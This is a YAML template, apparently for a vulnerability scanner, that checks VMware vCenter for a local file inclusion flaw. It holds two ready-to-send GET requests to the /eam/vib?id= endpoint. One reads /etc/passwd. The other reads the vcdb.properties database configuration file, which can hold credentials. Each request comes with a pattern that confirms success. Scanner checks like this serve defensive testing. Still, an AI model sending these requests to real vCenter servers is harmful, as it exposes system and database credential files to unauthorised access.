product: Vmware-vCenter
vName: Vmware-vCenter - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /eam/vib?id=/etc/passwd
    verify:
      logic: and
      check:
        - regex:
            value:
              - 'root:x:0'
            logic: and
  - exp:
      method: get
      follow: false
      path: /eam/vib?id=c:\programdata\vmware\vcenterserver\cfg\vmware-vpx\vcdb.properties
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - org.postgresql.Driver
            logic: and